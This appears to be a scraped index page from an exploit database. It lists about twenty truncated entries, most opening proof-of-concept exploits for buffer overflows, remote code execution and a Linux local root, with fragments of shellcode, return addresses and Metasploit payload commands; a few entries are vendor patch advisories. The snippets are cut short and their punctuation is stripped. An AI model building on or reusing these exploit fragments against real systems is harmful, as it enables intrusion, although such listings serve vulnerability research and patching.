PHP cgimode fpm writeprocmemfile bypass disable function demo Vulnerability

Exploit for php platform in category web applications ?php errorreporting0x66778899; settimelimit0x41424344; define'ZENDINIUSER', 10; define'ZENDINIPERDIR', 11; define'ZENDINISYSTEM', 12; / 00df9000-00e16000 rw-p 00000000 00:00 0 017ff000-01a51000 rw-p 00000000 00:00 0 heap...

MiniUPnPd 1.0 - Stack Overflow RCE for AirTies RT Series (MIPS) Exploit

Exploit for multiple platform in category remote exploits !/usr/bin/env python Exploit Title: MiniUPnPd 1.0 Stack Overflow RCE for AirTies RT Series Date: 26.04.2015 Exploit Author: Onur ALANBEL BGA Vendor Homepage: http://miniupnp.free.fr/ Version: 1.0 Architecture: MIPS Tested on: AirTies...

ElasticSearch command execution vulnerability: by perl to rally the shell-vulnerability warning-the black bar safety net

ElasticSearch is based on Lucene Search Server. It provides a distributed multi-user capability of the full-text search engine, based on the RESTful web interface. Elasticsearch is developed in Java, and as the Apache License under the terms of the open source release, is the second most popular...

Dell-iDRAC-IPMI-1.5

Dell iDRAC IPMI v1.5 Implementation contains a flaw that is triggered as session IDs are assigned incrementally rather than randomly, and limit the overall pool. This may allow a remote attacker trivially predict session IDs, hijack a session, and inject arbitrary commands. from time import sleep...

BlazeVideo-HDTV-Player-multi

Take a look at mona.py : awesome tool developed by corelanc0d3r and his team: https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/ this is the old fashioned bug, i just try to make it universal : it has also been exploited by: import struct file = 'blazevideo-universal.plf' totalsize =...

ABBS-Audio-Media-Player-3.1-(.lst)

Exploit Title: ABBS Audio Media Player v3.1 .lst Buffer Overflow Version: v3.1 Date: 2013-05-04 from struct import pack file="exploit.lst" windows/exec CMD=calc.exe Encoder: x86/shikataganai powered by Metasploit msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode =...

MinaliC-Webserver-2.0.0

Exploit Title: MinaliC Webserver buffer overflow Date: 12 Apr 2013 Exploit Author: superkojiman - http://www.techorganic.com Vendor Homepage: http://minalic.sourceforge.net/ Version: MinaliC Webserver 2.0.0 import socket import struct 74 bytes calc.exe from...

jetAudio 8.1.3.2200 Crash Proof Of Concept

Exploit Title : jetAudio 8.1.3.2200 Basic m3u Crash POC Product : jetAudio Basic Date : 27.12.2014 Exploit Author : Hadji Samir [email protected] Software Link : http://www.jetaudio.com/download/ Vulnerable version : 8.1.3.2200 Basic Vendor Homepage : http://www.jetaudio.com/ Tested on : Windows 7...

Linux Kernel libfutex Local Root for RHEL/CentOS 7.0.1406 Exploit

Exploit for linux platform in category local exploits / CVE-2014-3153 exploit for RHEL/CentOS 7.0.1406 By Kaiqu Chen email protected Based on libfutex and the expoilt for Android by GeoHot. Usage: $gcc exploit.c -o exploit -lpthread $./exploit / include include include include include include...

RHEL 6 : kernel (RHSA-2014:1365)

Updated kernel packages that fix one security issue and several bugs are now available for Red Hat Enterprise Linux 6.4 Extended Update Support. Red Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System CVSS base score, which gives a...

[SECURITY] Fedora 20 Update: ctags-5.8-16.fc20

Ctags generates an index or tag file of C language objects found in C source and header files. The index makes it easy for text editors or other utilities to locate the indexed items. Ctags can also generate a cross reference file which lists information about the various objects found in a set o...

BlazeDVD Pro 7.0 Buffer Overflow

BlazeDVD Pro v7.0 - .plf Buffer Overflow SEH Date: 19.08.2014 Exploit Author: metacom Vendor Homepage: http://www.blazevideo.com/ Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe Version: 7.0.0.0 Tested on: Win 7 EN, Win 8.1 !/usr/bin/python from struct import pack buffer=...

Android Web Browser - BMP File Integer Overflow Vulnerability

source: http://www.securityfocus.com/bid/28006/info Android Web Browser is prone to an integer-overflow vulnerability because it fails to adequately handle user-supplied data. Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts wil...

Linux Kernel Stack Infoleaks Vulnerability

No description provided by source. //Enjoy... // //-Dan / You've done it. After hours of gdb and caffeine, you've finally got a shell on your target's server. Maybe next time they will think twice about running MyFirstCompSciProjectFTPD on a production machine. As you take another sip of Mountain...

HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution

No description provided by source. Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Date: 2010.07.02 Author: S2 Crew Hungary Software Link: hp.com Version: 7.53 Tested on: Windows 2003 CVE: CVE-2010-1554 Code : !/usr/bin/python import struct import socket...

Linksys Devices 1.42/1.43 GET Request Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/6301/info Several Linksys Broadband Router devices are prone to a buffer overflow conditions. The vulnerability occurs due to insufficient allocation of memory for buffers. An attacker can exploit this vulnerability by...

AudioCoder 0.8.29 - Memory Corruption (SEH)

Exploit Title: AudioCoder-0.8.29 Memory Corruption to Code executionSEH Author: sajith version: AudioCoder-0.8.29 vulnerable app link: http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.29.exe Tested in windows Xp sp3,english import struct rawinput"Letz start...

KMPlayer 3.8.0.117 - Buffer Overflow Exploit

Exploit for windows platform in category local exploits import struct def littleendianaddress: return struct.pack"L",address junk = "\x41" 250 eip = littleendian0x7C86467B 7C86467B FFE4 JMP ESP kernel32.dll shellcode= "\x31\xC9" // xor ecx,ecx "\x51" // push ecx "\x68\x63\x61\x6C\x63" // push...

Python - socket.recvfrom_into() Remote Buffer Overflow

Python - socket.recvfrominto Remote Buffer Overflow !/usr/bin/env python ''' Exploit Title: python socket.recvfrominto remote buffer overflow Date: 21/02/2014 Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-19...

SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write

''' Title: SolidWorks Workgroup PDM 2014 SP2 Arbitrary File Write Vulnerability Date: 2-21-2014 Author: Mohamed Shetta Email: mshetta |at| live |dot| com Vendor Homepage: http://www.solidworks.com/sw/products/product-data-management/workgroup-pdm.htm Tested on: Windows 7 Vulnerability type:...